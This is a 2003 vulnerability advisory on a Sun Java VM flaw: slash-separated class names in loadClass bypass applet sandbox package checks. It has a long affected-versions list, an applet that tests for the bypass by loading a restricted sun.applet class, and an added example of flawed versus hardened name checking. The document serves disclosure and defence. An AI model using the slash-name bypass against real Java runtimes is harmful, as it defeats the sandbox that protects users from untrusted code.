
Sun Java Virtual Machine Path Handling Security Model Bypass Vulnerability


Published: 2003-10-22
Updated: 2003-11-06
Severity:
Threat level: ordinary user access privileges
Error type: design error
Exploitation method: server mode

BUGTRAQ ID:8879

Affected systems
HP HP-UX 11.0                                    
HP HP-UX 11.11                                  
HP HP-UX 11.22                                  
HP HP-UX 11.23                                  
Sun JRE (Linux Production Release) 1.2.2 _015    
Sun JRE (Linux Production Release) 1.2.2 _014    
Sun JRE (Linux Production Release) 1.2.2 _013    
Sun JRE (Linux Production Release) 1.2.2 _011    
Sun JRE (Linux Production Release) 1.2.2 _010    
Sun JRE (Linux Production Release) 1.2.2 _007    
Sun JRE (Linux Production Release) 1.2.2 _006    
Sun JRE (Linux Production Release) 1.2.2 _005    
   -Debian Linux 2.2                            
   -MandrakeSoft Linux Mandrake 7.2              
   -RedHat Linux 7.0                            
   -S.u.S.E. Linux 7.0                          
Sun JRE (Linux Production Release) 1.2.2 _004    
Sun JRE (Linux Production Release) 1.2.2 _003    
Sun JRE (Linux Production Release) 1.2.2        
Sun JRE (Linux Production Release) 1.3.1 _07    
Sun JRE (Linux Production Release) 1.3.1 _06    
Sun JRE (Linux Production Release) 1.3.1 _05    
Sun JRE (Linux Production Release) 1.3.1 _03    
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1 _02    
Sun JRE (Linux Production Release) 1.3.1 _01    
Sun JRE (Linux Production Release) 1.3.1        
Sun JRE (Linux Production Release) 1.4.1 _03    
Sun JRE (Linux Production Release) 1.4.1 _02    
Sun JRE (Linux Production Release) 1.4.1 _01    
   +Opera Software Opera Web Browser 7.11        
Sun JRE (Linux Production Release) 1.4.1        
Sun JRE (Reference Release) 1.2.2 _011          
Sun JRE (Reference Release) 1.2.2 _010          
Sun JRE (Solaris Production Release) 1.2.2 _014  
Sun JRE (Solaris Production Release) 1.2.2 _013  
Sun JRE (Solaris Production Release) 1.2.2 _012  
Sun JRE (Solaris Production Release) 1.2.2 _011  
Sun JRE (Solaris Production Release) 1.2.2 _010  
Sun JRE (Solaris Production Release) 1.2.2      
Sun JRE (Solaris Production Release) 1.3.1 _07  
Sun JRE (Solaris Production Release) 1.3.1 _06  
Sun JRE (Solaris Production Release) 1.3.1 _05  
Sun JRE (Solaris Production Release) 1.3.1 _04  
Sun JRE (Solaris Production Release) 1.3.1 _03  
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1 _02  
Sun JRE (Solaris Production Release) 1.3.1 _01  
Sun JRE (Solaris Production Release) 1.4.1 _03  
Sun JRE (Solaris Production Release) 1.4.1 _02  
Sun JRE (Solaris Production Release) 1.4.1 _01  
   +Opera Software Opera Web Browser 7.11        
Sun JRE (Solaris Production Release) 1.4.1      
Sun JRE (Windows Production Release) 1.2.2 _015  
Sun JRE (Windows Production Release) 1.2.2 _014  
Sun JRE (Windows Production Release) 1.2.2 _013  
Sun JRE (Windows Production Release) 1.2.2 _011  
Sun JRE (Windows Production Release) 1.2.2 _010  
Sun JRE (Windows Production Release) 1.2.2      
Sun JRE (Windows Production Release) 1.3.1 _07  
Sun JRE (Windows Production Release) 1.3.1 _06  
Sun JRE (Windows Production Release) 1.3.1 _05  
Sun JRE (Windows Production Release) 1.3.1 _04  
Sun JRE (Windows Production Release) 1.3.1 _03  
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1 _02  
Sun JRE (Windows Production Release) 1.3.1 _01a  
Sun JRE (Windows Production Release) 1.3.1 _01  
Sun JRE (Windows Production Release) 1.4.1 _03  
Sun JRE (Windows Production Release) 1.4.1 _02  
Sun JRE (Windows Production Release) 1.4.1 _01  
   +Opera Software Opera Web Browser 7.11        
   +Opera Software Opera Web Browser 7.11 j      
Sun JRE (Windows Production Release) 1.4.1      
Sun JRE (Windows Production Release) 1.4.2 _01  
Sun SDK (Linux Production Release) 1.2.2 _13    
Sun SDK (Linux Production Release) 1.2.2 _12    
Sun SDK (Linux Production Release) 1.2.2 _015    
Sun SDK (Linux Production Release) 1.2.2 _014    
Sun SDK (Linux Production Release) 1.2.2 _011    
Sun SDK (Linux Production Release) 1.2.2 _010    
Sun SDK (Linux Production Release) 1.3.1 _07    
Sun SDK (Linux Production Release) 1.3.1 _06    
Sun SDK (Linux Production Release) 1.3.1 _05    
Sun SDK (Linux Production Release) 1.3.1 _03    
Sun SDK (Linux Production Release) 1.3.1 _02    
Sun SDK (Linux Production Release) 1.3.1 _01    
Sun SDK (Linux Production Release) 1.4.1 _03    
Sun SDK (Linux Production Release) 1.4.1 _02    
Sun SDK (Linux Production Release) 1.4.1 _01    
Sun SDK (Linux Production Release) 1.4.1        
Sun SDK (Solaris Production Release) 1.2.2 _14  
Sun SDK (Solaris Production Release) 1.2.2 _13  
Sun SDK (Solaris Production Release) 1.2.2 _12  
Sun SDK (Solaris Production Release) 1.2.2 _11  
Sun SDK (Solaris Production Release) 1.2.2 _10  
Sun SDK (Solaris Production Release) 1.2.2 _07a  
Sun SDK (Solaris Production Release) 1.2.2      
Sun SDK (Solaris Production Release) 1.3.1 _07  
Sun SDK (Solaris Production Release) 1.3.1 _06  
Sun SDK (Solaris Production Release) 1.3.1 _05  
Sun SDK (Solaris Production Release) 1.3.1 _03  
Sun SDK (Solaris Production Release) 1.3.1 _02  
Sun SDK (Solaris Production Release) 1.3.1 _01  
Sun SDK (Solaris Production Release) 1.4.1 _03  
Sun SDK (Solaris Production Release) 1.4.1 _02  
Sun SDK (Solaris Production Release) 1.4.1 _01  
Sun SDK (Solaris Production Release) 1.4.1      
Sun SDK (Solaris Reference Release) 1.2.2 _015  
Sun SDK (Solaris Reference Release) 1.2.2 _014  
Sun SDK (Solaris Reference Release) 1.2.2 _013  
Sun SDK (Solaris Reference Release) 1.2.2 _012  
Sun SDK (Solaris Reference Release) 1.2.2 _011  
Sun SDK (Solaris Reference Release) 1.2.2 _010  
Sun SDK (Windows Production Release) 1.2.2 _015  
Sun SDK (Windows Production Release) 1.2.2 _014  
Sun SDK (Windows Production Release) 1.2.2 _013  
Sun SDK (Windows Production Release) 1.2.2 _012  
Sun SDK (Windows Production Release) 1.2.2 _011  
Sun SDK (Windows Production Release) 1.2.2 _010  
Sun SDK (Windows Production Release) 1.3.1 _07  
Sun SDK (Windows Production Release) 1.3.1 _06  
Sun SDK (Windows Production Release) 1.3.1 _05  
Sun SDK (Windows Production Release) 1.3.1 _04  
Sun SDK (Windows Production Release) 1.3.1 _03  
Sun SDK (Windows Production Release) 1.3.1 _02  
Sun SDK (Windows Production Release) 1.3.1 _01a  
Sun SDK (Windows Production Release) 1.4.1 _03  
Sun SDK (Windows Production Release) 1.4.1 _02  
Sun SDK (Windows Production Release) 1.4.1 _01  
Sun SDK (Windows Production Release) 1.4.1
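
Detailed description
The Sun Java Virtual Machine has a logic flaw in its implementation of the loadClass method. An attacker can exploit this vulnerability to bypass Java's security controls and execute arbitrary code on the host.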

Test code
Alla Bezroutchko <alla@scanit.be>

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

    StringBuffer buffer;

    public void init() {
        buffer = new StringBuffer();
    }

    public void start() {
        ClassLoader cl = this.getClass().getClassLoader();
        try {
            // Request a class from a restricted package, written with '/' separators.
            Class cla =
                cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
            addItem("No exception in loadClass. Vulnerable!");
        } catch (ClassNotFoundException e) {
            addItem("ClassNotFoundException in loadClass - " + e);
        } catch (AccessControlException e) {
            addItem("AccessControlException in loadClass - Not Vulnerable!");
        }
    }

    // Print the result and append it to the text shown in the applet.
    void addItem(String newWord) {
        System.out.println(newWord);
        buffer.append(newWord);
        repaint();
    }

    public void paint(Graphics g) {
        // Draw a rectangle around the applet's display area.
        g.drawRect(0, 0, size().width - 1, size().height - 1);

        // Draw the current string inside the rectangle.
        g.drawString(buffer.toString(), 5, 15);
    }
}
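
Why the slash form in the test above matters, as an added example that is neither part of the original advisory nor Sun's source code. It assumes a loader that derives the package to check from the last '.' in the requested name; RESTRICTED, naiveCheck and strictCheck are hypothetical names and the sample policy is constructed.

```java
import java.util.Arrays;
import java.util.List;
// Added illustration: a simplified model of a name-based package check.
// Not Sun's source code; all names below are hypothetical.
public class PackageCheckDemo {
    // Constructed sample policy: package prefixes untrusted code may not load.
    static final List<String> RESTRICTED = Arrays.asList("sun.");

    static void checkPackageAccess(String pkg) {
        for (String prefix : RESTRICTED) {
            if ((pkg + ".").startsWith(prefix)) {
                throw new SecurityException("access denied: " + pkg);
            }
        }
    }

    // Flawed: the package is taken from the last '.', so a name written with
    // '/' separators appears to have no package and the check is skipped.
    static void naiveCheck(String name) {
        int i = name.lastIndexOf('.');
        if (i != -1) {
            checkPackageAccess(name.substring(0, i));
        }
    }

    // Hardened (one possible approach): reject names that are not in
    // dotted binary-name form before deriving the package.
    static void strictCheck(String name) {
        if (name.indexOf('/') != -1) {
            throw new SecurityException("illegal class name: " + name);
        }
        naiveCheck(name);
    }

    static String run(boolean strict, String name) {
        try {
            if (strict) strictCheck(name); else naiveCheck(name);
            return "allowed";
        } catch (SecurityException e) {
            return "denied";
        }
    }

    public static void main(String[] args) {
        String[] names = { "sun.applet.AppletClassLoader",
            "sun/applet/AppletClassLoader", "java.lang.String" };
        for (String n : names) {
            System.out.println(n + " naive=" + run(false, n) + " strict=" + run(true, n));
        }
    }
}
```

The naive check denies the dotted name but lets the slash form through, while the strict check denies both and still allows java.lang.String.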

Solution
The vendor has fixed this vulnerability in newer versions of the software:

http://java.sun.com/j2se/

Related information
[LSD] Security vulnerability in SUN's Java Virtual Machine implementation
http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html

Sun Alert ID: 57221
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221